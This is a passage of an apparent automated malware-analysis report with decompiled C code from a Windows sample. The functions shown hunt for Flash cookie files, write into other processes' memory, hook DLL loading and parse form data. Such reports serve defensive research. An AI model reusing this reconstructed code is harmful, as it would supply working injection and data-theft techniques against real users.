      • Part of subcall function 0040A077: FindClose.KERNEL32(00000000), ref: 0040A15A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Path$CombineFind$File$CloseFirstFolderMatchNextSpecSpecial
    • String ID: *.sol$Macromedia\Flash Player
    • API String ID: 304139136-1405511494
    • Opcode ID: 5caf7eba2ccd23bd81a2b18dd006a194f7d719e39bc1712a84a89ab17f9ecbb6
    • Instruction ID: dfdd04799b28c069b5ae4ba10155d839c5e1a14ad28c391e939348e5b89c198f
    • Opcode Fuzzy Hash: 5caf7eba2ccd23bd81a2b18dd006a194f7d719e39bc1712a84a89ab17f9ecbb6
    • Instruction Fuzzy Hash: 5BF096F150530C69F710EB619D89EAF772C9B84344F208577B714A64C2D6B89D458629
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00410341, Relevance: 6.1, APIs: 4, Instructions: 80fileCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00410341(signed int __edx, long __edi, void** __esi, void* _a4) {
				char _v5;
				long _v12;
				void _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t22;
				signed int _t25;
				signed int _t41;
				void** _t43;

				_t43 = __esi;
				_t41 = __edx;
				_v5 = 0;
				if(__edi <= 0xa00000) {
					_t22 = E0040DD0C( *__esi);
					_v36 = _t22;
					_v32 = _t41;
					if((_t22 & _t41) != 0xffffffff && E0040DCEC( *__esi, 0, 0, 2) != 0) {
						_t25 = E0040DD0C( *__esi);
						_v28 = _t25;
						_v24 = _t41;
						if((_t25 & _t41) != 0xffffffff) {
							E0040CFFE( &_v20,  &_v20, 0, 5);
							_v20 = __esi[4] ^ __edi;
							if(WriteFile( *__esi,  &_v20, 5,  &_v12, 0) == 0 || _v12 != 5 || WriteFile( *__esi, _a4, __edi,  &_v12, 0) == 0 || _v12 != __edi) {
								E0040DCEC( *_t43, _v28, _v24, 0);
								SetEndOfFile( *_t43);
							} else {
								_v5 = 1;
							}
						}
						FlushFileBuffers( *_t43);
						E0040DCEC( *_t43, _v36, _v32, 0);
					}
				}
				return _v5;
			}














    0x00410341
    0x00410341
    0x0041034a
    0x00410353
    0x0041035b
    0x00410360
    0x00410365
    0x0041036b
    0x00410386
    0x0041038b
    0x00410390
    0x00410396
    0x0041039f
    0x004103aa
    0x004103c1
    0x004103f2
    0x004103f9
    0x004103e3
    0x004103e3
    0x004103e3
    0x004103c1
    0x00410401
    0x00410410
    0x00410410
    0x0041036b
    0x0041041a

    APIs
      • Part of subcall function 0040DD0C: SetFilePointerEx.KERNEL32(?,00000000,00000000,00410360,00000001,00410360,?,00000000,?,?,?,00000008,00000000,00000000,00000000,00000000), ref: 0040DD21
      • Part of subcall function 0040DCEC: SetFilePointerEx.KERNEL32(00000004,00000004,00000004,00000000,00000002,00410317,?,00000000,00000000,00000000), ref: 0040DCFE
    • WriteFile.KERNEL32(?,00000000,00000005,00000000,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000002,?,00000000), ref: 004103B9
    • WriteFile.KERNEL32(?,00000005,00000000,00000005,00000000,?,?,?,00000008,00000000,00000000), ref: 004103D4
    • SetEndOfFile.KERNEL32(?,?,?,00000008,00000000,?,?,?,00000008,00000000,00000000,00000000,00000000), ref: 004103F9
    • FlushFileBuffers.KERNEL32(?,?,?,00000000,00000000,00000002,?,00000000,?,?,?,00000008,00000000,00000000,00000000,00000000), ref: 00410401
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$PointerWrite$BuffersFlush
    • String ID:
    • API String ID: 1289656144-0
    • Opcode ID: 4ab6209e606ad639b4d0aa36ea1eaa4da40e2909b8b734c14b4dd06c8b967e33
    • Instruction ID: 465fb72d9efd9005c1f753ecd4312ceac0d4ed359152173c6b9a5d926640979f
    • Opcode Fuzzy Hash: 4ab6209e606ad639b4d0aa36ea1eaa4da40e2909b8b734c14b4dd06c8b967e33
    • Instruction Fuzzy Hash: 16214875900108EFEB219FE5CC85AEEBBB9FF08344F14852AF590A11A1D37A4994DB58
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00405452, Relevance: 6.1, APIs: 4, Instructions: 73memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 77%
    			E00405452(void* __ecx, void* __edi, intOrPtr _a4) {
				long _v8;
				intOrPtr _t10;
				intOrPtr _t13;
				void* _t15;
				void* _t31;
				void* _t37;

				_t37 = __edi;
				if(__edi <= 0x3e8) {
					 *0x412dd4(0x412708);
					_v8 = GetTickCount();
					_t10 =  *0x412720; // 0x0
					if(_t10 != 0 && _v8 - _t10 > 0xea60) {
						E0040541D();
					}
					_t12 = ( *0x412704 & 0x0000ffff) + _t37;
					if(( *0x412704 & 0x0000ffff) + _t37 <= 0x3e8) {
						_t13 = E0040CEF9(_t12,  *0x412728);
						if(_t13 != 0) {
							 *0x412728 = _t13;
							E0040CF7C(( *0x412704 & 0x0000ffff) + _t13, _a4, _t37);
							 *0x412704 =  *0x412704 + _t37;
						}
					} else {
						_t31 = RtlAllocateHeap( *0x413e5c, 8, 0x3ec);
						if(_t31 != 0) {
							E0040CF7C(_t17 - _t37 + 0x3e8, _a4, _t37);
							E0040CF7C(_t31, ( *0x412704 & 0x0000ffff) +  *0x412728 + _t37 - 0x3e8, 0x3e8 - _t37);
							E0040CF40( *0x412728);
							 *0x412728 = _t31;
							 *0x412704 = 0x3e8;
						}
					}
					 *0x412720 = _v8;
					_t15 =  *0x412dd8(0x412708);
				} else {
					_t15 = E0040541D();
				}
				return _t15;
			}









    0x00405452
    0x0040545e
    0x0040546f
    0x0040547b
    0x0040547e
    0x00405485
    0x00405494
    0x00405494
    0x004054a0
    0x004054a5
    0x0040550e
    0x00405515
    0x00405525
    0x0040552a
    0x0040552f
    0x0040552f
    0x004054a7
    0x004054ba
    0x004054be
    0x004054c9
    0x004054e9
    0x004054f4
    0x004054f9
    0x004054ff
    0x004054ff
    0x004054be
    0x0040553e
    0x00405543
    0x00405460
    0x00405460
    0x00405460
    0x0040554c

    APIs
    • RtlEnterCriticalSection.NTDLL(00412708), ref: 0040546F
    • GetTickCount.KERNEL32 ref: 00405475
    • RtlAllocateHeap.NTDLL(00000008,000003EC), ref: 004054B4
    • RtlLeaveCriticalSection.NTDLL(00412708), ref: 00405543
      • Part of subcall function 0040541D: RtlEnterCriticalSection.NTDLL(00412708), ref: 00405424
      • Part of subcall function 0040541D: RtlLeaveCriticalSection.NTDLL(00412708), ref: 0040544A
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalSection$EnterLeave$AllocateCountHeapTick
    • String ID:
    • API String ID: 2032597661-0
    • Opcode ID: a171f2932746065c09769cb19ee86ceb18ecc2350e6a474824cb23a10c3258f5
    • Instruction ID: 1ffb31d34ea1d2de778b0a17c99054d7cff915f2aca7fe009a68b0076a66bccb
    • Opcode Fuzzy Hash: a171f2932746065c09769cb19ee86ceb18ecc2350e6a474824cb23a10c3258f5
    • Instruction Fuzzy Hash: 8521FF71500210EBCB116F65EE95EEF3BA9EB49745700813BF515E22E1D6B889A0CF2C
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00406835, Relevance: 6.1, APIs: 4, Instructions: 51injectionCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00406835(void* __edi, void* _a4) {
				long _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				int _t22;
				void* _t24;

				_t24 =  *0x4129ec; // 0xffffffff
				_t22 = 0;
				if(VirtualQueryEx(_t24, __edi,  &_v36, 0x1c) != 0 && _v36.Protect != 1 && (_v36.Protect & 0x00000100) == 0 && _v36.RegionSize != 0 && VirtualProtectEx(_t24, __edi, 4, 0x40,  &_v8) != 0) {
					_t22 = WriteProcessMemory(_t24, __edi, _a4, 4, 0);
					VirtualProtectEx(_t24, __edi, 4, _v8,  &_v8);
				}
				return 0 | _t22 != 0x00000000;
			}







    0x0040683d
    0x0040684b
    0x00406855
    0x0040688d
    0x0040689a
    0x0040689a
    0x004068aa

    APIs
    • VirtualQueryEx.KERNEL32(FFFFFFFF,?,?,0000001C,00412448,00000000), ref: 0040684D
    • VirtualProtectEx.KERNEL32(FFFFFFFF,?,00000004,00000040,00000000), ref: 00406875
    • WriteProcessMemory.KERNEL32(FFFFFFFF,?,?,00000004,00000000), ref: 00406887
    • VirtualProtectEx.KERNEL32(FFFFFFFF,?,00000004,00000000,00000000), ref: 0040689A
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Virtual$Protect$MemoryProcessQueryWrite
    • String ID:
    • API String ID: 2789181485-0
    • Opcode ID: 4a1414de8f6fcd9fb900060e48988d82c2d0ef1868d4af8f223f611dafdccb13
    • Instruction ID: a55d5a2fbb3f21b82de9c2d0d020b877abb4158410f206941a8c2ef6ae20ab45
    • Opcode Fuzzy Hash: 4a1414de8f6fcd9fb900060e48988d82c2d0ef1868d4af8f223f611dafdccb13
    • Instruction Fuzzy Hash: AD015E72641209BBEB219A919D89FEF767CAF45714F008036FB01E5180D6B89A608B69
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004051D6, Relevance: 6.0, APIs: 4, Instructions: 40libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 25%
    			E004051D6(WCHAR* _a4, long _a8, UNICODE_STRING* _a12, HMODULE* _a16) {
				long _t16;
				void* _t18;
				void* _t19;
				HMODULE* _t21;

				_t21 = _a16;
				_t19 =  *0x412b18(_a4, _a8, _a12, _t21);
				_t16 = LdrLoadDll(_a4, _a8, _a12, _t21);
				if(_t16 == 0 && _t19 != 0 &&  *( *_t21) == 0x5a4d) {
					 *0x412dd4(0x4126ec);
					E00406A74(0x412448, 0x5a4d, _t18,  *_t21);
					 *0x412dd8(0x4126ec);
				}
				return _t16;
			}







    0x004051db
    0x004051f3
    0x00405201
    0x00405205
    0x0040521d
    0x0040522a
    0x00405230
    0x00405230
    0x0040523c

    APIs
    • LdrGetDllHandle.NTDLL(?,?,?,?), ref: 004051E9
    • LdrLoadDll.NTDLL(?,?,?,?), ref: 004051FB
    • RtlEnterCriticalSection.NTDLL(004126EC), ref: 0040521D
    • RtlLeaveCriticalSection.NTDLL(004126EC), ref: 00405230
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalSection$EnterHandleLeaveLoad
    • String ID:
    • API String ID: 1466281904-0
    • Opcode ID: c6a79b7b14800902cadf42bc909900be28cfe1bbff20eb4c58b936233f281649
    • Instruction ID: eedc1082a0b2c18afda14114fb43136e1a95e30f82504f764a0424dde226b1ef
    • Opcode Fuzzy Hash: c6a79b7b14800902cadf42bc909900be28cfe1bbff20eb4c58b936233f281649
    • Instruction Fuzzy Hash: CEF03136200508BBDB115F95ED44CEB3B79EF89324700803AF90493260D7B598619F65
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040A9FB, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 359COMMON
    Download Yara Rule
    C-Code - Quality: 92%
    			E0040A9FB(void* __edx, intOrPtr _a4, char _a7, intOrPtr _a8, intOrPtr* _a12, signed int* _a16) {
				signed int _v5;
				char _v6;
				unsigned int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				char _v52;
				char _v68;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t140;
				signed int _t146;
				signed short _t147;
				signed short _t148;
				signed int _t149;
				signed short _t151;
				signed char _t152;
				signed int _t153;
				signed int _t157;
				void* _t159;
				signed char _t163;
				unsigned int _t164;
				intOrPtr _t167;
				intOrPtr _t168;
				signed int _t169;
				signed int _t171;
				signed int _t173;
				signed int _t176;
				signed int _t180;
				void* _t191;
				signed int _t192;
				signed int _t196;
				void* _t198;
				intOrPtr _t202;
				signed int _t208;
				signed int _t210;
				signed int _t212;
				void* _t219;
				signed int _t220;
				void* _t223;
				intOrPtr* _t224;
				char* _t239;
				signed int _t246;
				void* _t250;
				intOrPtr _t255;
				signed int _t256;
				signed int _t261;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				char* _t266;
				signed int _t269;
				intOrPtr* _t271;
				signed int _t273;
				void* _t274;
				void* _t275;

				_t255 = _a8;
				if( *((intOrPtr*)(_t255 + 0x41c)) < 8) {
					return 0;
				}
				_v16 = _v16 & 0x00000000;
				_t269 = E0040FE8D( &_v16, __edx, __eflags, _a4, 0x4e2a, 0x20000000);
				_v32 = _t269;
				_v6 = 0;
				__eflags = _t269;
				if(_t269 == 0) {
					L73:
					E0040CF40(_v32);
					return _v6;
				} else {
					__eflags = _v16 - 0x10;
					if(_v16 <= 0x10) {
						goto L73;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						__eflags = ( *_t269 & 0x0000ffff) - _v32 + _t269 - _v16;
						if(( *_t269 & 0x0000ffff) - _v32 + _t269 > _v16) {
							goto L73;
						}
						_t140 =  *(_t269 + 8) & 0x0000ffff;
						__eflags = _t140;
						if(_t140 == 0) {
							L13:
							_t269 = _t269 + ( *_t269 & 0x0000ffff);
							__eflags = _t269 - _v32 + 0x10 - _v16;
							if(_t269 - _v32 + 0x10 < _v16) {
								continue;
							}
							goto L73;
						}
						_v12 = (_t140 & 0x0000ffff) + _t269;
						_v24 = E0040D3C6((_t140 & 0x0000ffff) + _t269);
						_t146 = E00408C0D((_t140 & 0x0000ffff) + _t269, _t145, _t255,  *((intOrPtr*)(_t255 + 0x400)), 0, 0, 0);
						__eflags = _t146;
						if(_t146 == 0) {
							goto L13;
						}
						_t147 =  *(_t269 + 0xa) & 0x0000ffff;
						__eflags = _t147;
						if(_t147 == 0) {
							L9:
							_t148 =  *(_t269 + 0xc) & 0x0000ffff;
							__eflags = _t148;
							if(_t148 == 0) {
								L15:
								__eflags =  *((char*)(_t269 + 6)) - 9;
								if( *((char*)(_t269 + 6)) > 9) {
									 *((char*)(_t269 + 6)) = 0;
								}
								__eflags =  *(_t269 + 4);
								if( *(_t269 + 4) == 0) {
									 *(_t269 + 4) = 1;
								}
								_t149 =  *((intOrPtr*)(_t269 + 6));
								_v5 = _t149;
								__eflags = _t149;
								if(_t149 == 0) {
									_v5 = 6;
								}
								_t256 =  *(_t255 + 0x418);
								_t219 =  *((intOrPtr*)(_a8 + 0x41c)) + _t256;
								_v20 = _v20 & 0x00000000;
								_t244 = _t256;
								while(1) {
									__eflags = _t256 - _t219;
									if(_t256 >= _t219) {
										break;
									}
									__eflags =  *_t256 - 0x3d;
									if( *_t256 != 0x3d) {
										L40:
										_t256 = _t256 + 1;
										__eflags = _t256;
										continue;
									}
									_t151 =  *(_t269 + 0xe) & 0x0000ffff;
									_a7 = 0;
									__eflags = _t151;
									if(_t151 != 0) {
										_t208 = E00408C0D((_t151 & 0x0000ffff) + _t269, E0040D3C6((_t151 & 0x0000ffff) + _t269), _t244, _t256 - _t244, 0, 0, 0);
										__eflags = _t208;
										if(_t208 == 0) {
											_a7 = 1;
										}
									}
									_t152 =  *((intOrPtr*)(_t269 + 5));
									__eflags = _t152;
									if(_t152 != 0) {
										_v20 = _v20 + 1;
										__eflags = (_t152 & 0x000000ff) - _v20;
										if((_t152 & 0x000000ff) != _v20) {
											_t44 =  &_a7;
											 *_t44 = _a7 + 1;
											__eflags =  *_t44;
										}
									}
									_t153 = _t256;
									_v28 = _t256;
									while(1) {
										__eflags = _t153 - _t219;
										if(_t153 >= _t219) {
											break;
										}
										_t153 = _t153 + 1;
										__eflags =  *_t153 - 0x26;
										_v28 = _t153;
										if( *_t153 != 0x26) {
											continue;
										}
										break;
									}
									__eflags = _a7;
									if(_a7 != 0) {
										L39:
										_t244 = _v28 + 1;
										__eflags = _v28 + 1;
										goto L40;
									}
									_t246 = _v5 & 0x000000ff;
									__eflags = _t153 - _t256 - 1 - _t246;
									if(_t153 - _t256 - 1 != _t246) {
										goto L39;
									}
									_t223 = 0;
									__eflags = _t246;
									if(_t246 <= 0) {
										L38:
										_t157 = E0040DE73( &_v68, _v12, _v24);
										__eflags = _t157;
										if(_t157 != 0) {
											_t220 = _v5 & 0x000000ff;
											_v36 = _t256 + 1;
											_t159 = E0040CF7C( &_v52, _t256 + 1, _t220);
											 *((char*)(_t275 + _t220 - 0x30)) = 0;
											_v28 = E0040D180(_t159, _t223);
											_v20 = 0;
											_t163 = E00407945( &_v20, _t223, 0,  &_v68);
											_v12 = _t163;
											_v24 = 0;
											__eflags = _t163 & 0x00000003;
											if((_t163 & 0x00000003) != 0) {
												_v12 = 0;
											}
											_t224 = _v20;
											_t164 = 4;
											__eflags = _v12 - _t164;
											if(_v12 < _t164) {
												_v12 = _t164;
											} else {
												_v24 =  *_t224;
											}
											asm("sbb dl, dl");
											_v12 = _v12 >> 2;
											_t250 =  ~(_v24 % ( *(_t269 + 4) & 0x000000ff)) + 1;
											_t261 = 1;
											_a7 = _t250;
											__eflags = _v12 - 1;
											if(_v12 <= 1) {
												L53:
												__eflags = _t250;
												if(_t250 <= 0) {
													L62:
													_t167 =  *0x412a64; // 0x246f5a8
													_v6 = 1;
													__eflags = _t250 - 1;
													if(_t250 != 1) {
														_t168 =  *((intOrPtr*)(_t167 + 0x17c));
													} else {
														_t168 =  *((intOrPtr*)(_t167 + 0x178));
													}
													_a8 = _t168;
													_t169 = E0040D3C6(_t168);
													_t262 = _a16;
													_t271 = _a12;
													_v16 = _t169;
													_t171 = E0040CED8( *_t262 + _t220 + _t169 + 0x14, _t271);
													__eflags = _t171;
													if(_t171 != 0) {
														wnsprintfA( &_v52, 0xf, "%%0%uu", _t220);
														wnsprintfA( &_v84, 0xf,  &_v52, _v28);
														 *_t262 =  *_t262 + E0040CF7C( *_t271 +  *_t262, _a8, _v16);
														E0040CF7C( *_t271 +  *_t262,  &_v84, _t220);
														_t191 =  *_t262 + _t220;
														 *((char*)(_t191 +  *_t271)) = 0xa;
														_t192 = _t191 + 1;
														__eflags = _t192;
														 *_t262 = _t192;
													}
													L68:
													_t263 = _v12;
													_t124 = _t263 + 4; // 0x6
													_t173 = E0040CED8(_t124,  &_v20);
													_t273 = _v20;
													__eflags = _t173;
													if(_t173 != 0) {
														__eflags = _a7 - 2;
														if(_a7 != 2) {
															_t180 = _v24 + 1;
															__eflags = _t180;
															 *_t273 = _t180;
														}
														_t176 = _t263 << 2;
														 *((intOrPtr*)(_t176 + _t273)) = _v28;
														__eflags = _t176 + 4;
														E004079B5(_t176 + 4, _t176 + 4, 0,  &_v68, _t273);
													}
													E0040CF40(_t273);
													goto L73;
												}
												_t264 = E0040CF93( *((intOrPtr*)(_a8 + 0x418)),  *((intOrPtr*)(_a8 + 0x41c)));
												_v16 = _t264;
												__eflags = _t264;
												if(_t264 == 0) {
													goto L68;
												}
												_t251 = _a8;
												_t266 = _t264 -  *((intOrPtr*)(_a8 + 0x418)) + _v36;
												__eflags =  *(_t269 + 2) & 0x00000001;
												if(__eflags == 0) {
													E0040CFFE(_t194, _t266, 0x31, _t220);
													L60:
													_t196 = E0040A944(_t251, __eflags, _v16,  *((intOrPtr*)(_t251 + 0x41c)));
													__eflags = _t196;
													if(_t196 == 0) {
														E0040CF40(_v16);
														goto L68;
													}
													_t250 = _a7;
													goto L62;
												}
												_t274 = _t220 + _t266;
												__eflags = _t266 - _t274;
												if(__eflags >= 0) {
													goto L60;
												} else {
													goto L57;
												}
												do {
													L57:
													_push(0x30);
													_t198 = 0x39;
													 *_t266 = E0040DF51(_t198);
													_t266 = _t266 + 1;
													__eflags = _t266 - _t274;
												} while (__eflags < 0);
												_t251 = _a8;
												goto L60;
											} else {
												while(1) {
													__eflags =  *((intOrPtr*)(_t224 + _t261 * 4)) - _v28;
													if( *((intOrPtr*)(_t224 + _t261 * 4)) == _v28) {
														break;
													}
													_t261 = _t261 + 1;
													__eflags = _t261 - _v12;
													if(_t261 < _v12) {
														continue;
													}
													goto L53;
												}
												_a7 = 2;
												_t250 = _a7;
												goto L53;
											}
										}
										goto L39;
									} else {
										goto L35;
									}
									while(1) {
										L35:
										_t202 =  *((intOrPtr*)(_t223 + _t256 + 1));
										__eflags = _t202 - 0x30;
										if(_t202 < 0x30) {
											goto L39;
										}
										__eflags = _t202 - 0x39;
										if(_t202 > 0x39) {
											goto L39;
										}
										_t223 = _t223 + 1;
										__eflags = _t223 - _t246;
										if(_t223 < _t246) {
											continue;
										}
										goto L38;
									}
									goto L39;
								}
								goto L73;
							}
							_t239 = (_t148 & 0x0000ffff) + _t269;
							__eflags =  *_t239 - 0x2a;
							if( *_t239 != 0x2a) {
								L12:
								_t210 = E00408C0D(_t239, E0040D3C6(_t239),  *(_t255 + 0x418),  *((intOrPtr*)(_t255 + 0x41c)), 0, 0, 0);
								__eflags = _t210;
								if(_t210 == 0) {
									goto L15;
								}
								goto L13;
							}
							__eflags =  *(_t239 + 1);
							if( *(_t239 + 1) == 0) {
								goto L15;
							}
							goto L12;
						}
						_t212 = E00408C0D((_t147 & 0x0000ffff) + _t269, E0040D3C6((_t147 & 0x0000ffff) + _t269),  *(_t255 + 0x418),  *((intOrPtr*)(_t255 + 0x41c)), 0, 0, 0);
						__eflags = _t212;
						if(_t212 == 0) {
							goto L13;
						}
						goto L9;
					}
					goto L73;
				}
			}
































































    0x0040aa02
    0x0040aa0c
    0x00000000
    0x0040aa0e
    0x0040aa15
    0x0040aa30
    0x0040aa34
    0x0040aa37
    0x0040aa3b
    0x0040aa3d
    0x0040addf
    0x0040ade2
    0x00000000
    0x0040aa43
    0x0040aa43
    0x0040aa47
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040aa4d
    0x0040aa4d
    0x0040aa55
    0x0040aa58
    0x00000000
    0x00000000
    0x0040aa5e
    0x0040aa62
    0x0040aa65
    0x0040aaf4
    0x0040aaf7
    0x0040ab01
    0x0040ab04
    0x00000000
    0x00000000
    0x00000000
    0x0040ab0a
    0x0040aa70
    0x0040aa84
    0x0040aa87
    0x0040aa8c
    0x0040aa8e
    0x00000000
    0x00000000
    0x0040aa90
    0x0040aa94
    0x0040aa97
    0x0040aabd
    0x0040aabd
    0x0040aac1
    0x0040aac4
    0x0040ab0f
    0x0040ab0f
    0x0040ab13
    0x0040ab15
    0x0040ab15
    0x0040ab18
    0x0040ab1b
    0x0040ab1d
    0x0040ab1d
    0x0040ab21
    0x0040ab24
    0x0040ab27
    0x0040ab29
    0x0040ab2b
    0x0040ab2b
    0x0040ab32
    0x0040ab3e
    0x0040ab40
    0x0040ab44
    0x0040abec
    0x0040abec
    0x0040abee
    0x00000000
    0x00000000
    0x0040ab4b
    0x0040ab4e
    0x0040abeb
    0x0040abeb
    0x0040abeb
    0x00000000
    0x0040abeb
    0x0040ab54
    0x0040ab58
    0x0040ab5c
    0x0040ab5f
    0x0040ab78
    0x0040ab7d
    0x0040ab7f
    0x0040ab81
    0x0040ab81
    0x0040ab7f
    0x0040ab85
    0x0040ab88
    0x0040ab8a
    0x0040ab8c
    0x0040ab92
    0x0040ab95
    0x0040ab97
    0x0040ab97
    0x0040ab97
    0x0040ab97
    0x0040ab95
    0x0040ab9a
    0x0040ab9c
    0x0040ab9f
    0x0040ab9f
    0x0040aba1
    0x00000000
    0x00000000
    0x0040aba3
    0x0040aba4
    0x0040aba7
    0x0040abaa
    0x00000000
    0x00000000
    0x00000000
    0x0040abaa
    0x0040abac
    0x0040abb0
    0x0040abe7
    0x0040abea
    0x0040abea
    0x00000000
    0x0040abea
    0x0040abb2
    0x0040abb9
    0x0040abbb
    0x00000000
    0x00000000
    0x0040abbd
    0x0040abbf
    0x0040abc1
    0x0040abd4
    0x0040abde
    0x0040abe3
    0x0040abe5
    0x0040abf9
    0x0040ac04
    0x0040ac07
    0x0040ac0c
    0x0040ac16
    0x0040ac23
    0x0040ac26
    0x0040ac2b
    0x0040ac2e
    0x0040ac31
    0x0040ac33
    0x0040ac35
    0x0040ac35
    0x0040ac38
    0x0040ac3d
    0x0040ac3e
    0x0040ac41
    0x0040ac4a
    0x0040ac43
    0x0040ac45
    0x0040ac45
    0x0040ac5a
    0x0040ac5c
    0x0040ac62
    0x0040ac64
    0x0040ac65
    0x0040ac68
    0x0040ac6b
    0x0040ac84
    0x0040ac84
    0x0040ac86
    0x0040acf8
    0x0040acf8
    0x0040acfd
    0x0040ad01
    0x0040ad04
    0x0040ad1b
    0x0040ad06
    0x0040ad06
    0x0040ad06
    0x0040ad23
    0x0040ad26
    0x0040ad2b
    0x0040ad30
    0x0040ad35
    0x0040ad3c
    0x0040ad41
    0x0040ad43
    0x0040ad51
    0x0040ad64
    0x0040ad7e
    0x0040ad8c
    0x0040ad95
    0x0040ad97
    0x0040ad9b
    0x0040ad9b
    0x0040ad9c
    0x0040ad9c
    0x0040ad9e
    0x0040ad9e
    0x0040ada1
    0x0040ada7
    0x0040adac
    0x0040adaf
    0x0040adb1
    0x0040adb3
    0x0040adb7
    0x0040adbc
    0x0040adbc
    0x0040adbd
    0x0040adbd
    0x0040adc4
    0x0040adc7
    0x0040adcf
    0x0040add4
    0x0040add4
    0x0040adda
    0x00000000
    0x0040adda
    0x0040ac9c
    0x0040ac9e
    0x0040aca1
    0x0040aca3
    0x00000000
    0x00000000
    0x0040aca9
    0x0040acb2
    0x0040acb5
    0x0040acb9
    0x0040acdc
    0x0040ace1
    0x0040acec
    0x0040acf1
    0x0040acf3
    0x0040ad11
    0x00000000
    0x0040ad11
    0x0040acf5
    0x00000000
    0x0040acf5
    0x0040acbb
    0x0040acbe
    0x0040acc0
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040acc2
    0x0040acc2
    0x0040acc2
    0x0040acc6
    0x0040accc
    0x0040acce
    0x0040accf
    0x0040accf
    0x0040acd3
    0x00000000
    0x0040ac6d
    0x0040ac6d
    0x0040ac70
    0x0040ac73
    0x00000000
    0x00000000
    0x0040ac75
    0x0040ac76
    0x0040ac79
    0x00000000
    0x00000000
    0x00000000
    0x0040ac7b
    0x0040ac7d
    0x0040ac81
    0x00000000
    0x0040ac81
    0x0040ac6b
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040abc3
    0x0040abc3
    0x0040abc3
    0x0040abc7
    0x0040abc9
    0x00000000
    0x00000000
    0x0040abcb
    0x0040abcd
    0x00000000
    0x00000000
    0x0040abcf
    0x0040abd0
    0x0040abd2
    0x00000000
    0x00000000
    0x00000000
    0x0040abd2
    0x00000000
    0x0040abc3
    0x00000000
    0x0040abf4
    0x0040aac9
    0x0040aacb
    0x0040aace
    0x0040aad5
    0x0040aaeb
    0x0040aaf0
    0x0040aaf2
    0x00000000
    0x00000000
    0x00000000
    0x0040aaf2
    0x0040aad0
    0x0040aad3
    0x00000000
    0x00000000
    0x00000000
    0x0040aad3
    0x0040aab4
    0x0040aab9
    0x0040aabb
    0x00000000
    0x00000000
    0x00000000
    0x0040aabb
    0x00000000
    0x0040aa4d

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID:
    • String ID: %%0%uu
    • API String ID: 0-1393091064
    • Opcode ID: c9fec5f46d24fa384b4efc5c11ab46135bbf1a9eaf2cac4a9e6edbf37a297d21
    • Instruction ID: b209e006af3860eb183c6da625e3960b69cd8ea8497dbe43eaa5c4caeecce437
    • Opcode Fuzzy Hash: c9fec5f46d24fa384b4efc5c11ab46135bbf1a9eaf2cac4a9e6edbf37a297d21
    • Instruction Fuzzy Hash: C2D10570904349AFDF11DFA4C880AFEBBB6AF05304F14807AE591BB2C1D7389956CB5A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040707A, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113COMMON
    Download Yara Rule
    C-Code - Quality: 97%
    			E0040707A(short _a4, signed int _a8, char* _a16, int _a20) {
				char _v5;
				WCHAR* _v12;
				intOrPtr _v40;
				intOrPtr _v48;
				char _v56;
				short _v576;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t39;
				signed char _t41;
				char _t43;
				void* _t45;
				WCHAR _t48;
				void* _t50;
				short* _t51;
				long _t53;
				signed int _t65;
				short _t71;
				short _t72;
				int _t74;
				WCHAR* _t76;

				_v5 = 0;
				if(_a4 == 0x43 || _a4 == 0x44) {
					E004098D3( &_v576);
					_t65 = E0040D3D8( &_v576) + 1;
					E00410649( &_v56);
					_v40 =  *_a8;
					_t39 =  *0x412974; // 0x0
					_v48 = _t39;
					_v12 =  &_v576;
					_t41 = E0040D9EB(_t65,  &_v56, __eflags, 0);
					asm("sbb al, al");
					_t43 =  ~_t41 + 1;
					__eflags = _t43;
					_v5 = _t43;
				} else {
					_t65 = ExpandEnvironmentStringsW(E0040D379(_a8 | 0xffffffff,  *_a8),  &_v576, 0x104);
					E0040CF40(_t60);
					_t43 = _v5;
				}
				if(_t65 != 0 && _t43 == 0) {
					_t74 = _a20;
					_t45 = _t65 + _t74;
					_t46 = _t45 + _t45 + 0x14;
					if(_t45 + _t45 + 0x14 != 0) {
						_t76 = E0040CF2D(_t46);
					} else {
						_t76 = 0;
					}
					_t48 = 0x22;
					 *_t76 = _t48;
					_t22 = _t76 + 2; // 0x2
					_t50 = E0040CF7C(_t22,  &_v576, _t65 + _t65);
					_t51 = _t50 + _t76;
					_t71 = 0x22;
					 *_t51 = _t71;
					if(_t74 != 0) {
						_t72 = 0x20;
